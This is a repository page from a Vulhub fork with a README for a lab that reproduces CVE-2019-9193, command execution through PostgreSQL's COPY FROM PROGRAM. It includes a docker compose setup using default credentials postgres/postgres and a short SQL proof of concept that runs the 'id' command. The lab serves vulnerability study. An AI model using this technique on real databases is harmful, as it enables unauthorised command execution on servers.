aaronxu/vulhub
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
main
vulhub/postgres/CVE-2019-9193
History
Aaron 63285f61aa
Some checks failed
Vulhub Format Check and Lint / format-check (push) Has been cancelled
Details
Vulhub Format Check and Lint / markdown-check (push) Has been cancelled
Details
Vulhub Docker Image CI / longtime-images-test (push) Has been cancelled
Details
Vulhub Docker Image CI / images-test (push) Has been cancelled
Details
first commit
2025-09-06 16:08:15 +08:00
..
1.png
first commit
2025-09-06 16:08:15 +08:00
docker-compose.yml
first commit
2025-09-06 16:08:15 +08:00
README.md
first commit
2025-09-06 16:08:15 +08:00
README.zh-cn.md
first commit
2025-09-06 16:08:15 +08:00

README.md

PostgreSQL Arbitrary Command Execution with Admin Privileges (CVE-2019-9193)

中文文档

PostgreSQL is a powerful open-source relational database system. A "feature" exists in versions 9.3 through 11 that allows administrators or users with "COPY TO/FROM PROGRAM" privileges to execute arbitrary commands on the system.

References:

Environment Setup

Execute the following command to start a vulnerable PostgreSQL 10.7 server:

docker compose up -d

The server will start and listen on the default PostgreSQL port 5432, with default credentials postgres/postgres.

Vulnerability Reproduction

First, connect to the PostgreSQL server and execute the following proof of concept:

DROP TABLE IF EXISTS cmd_exec;
CREATE TABLE cmd_exec(cmd_output text);
COPY cmd_exec FROM PROGRAM 'id';
SELECT * FROM cmd_exec;

The FROM PROGRAM statement will execute the id command and save the results in the cmd_exec table: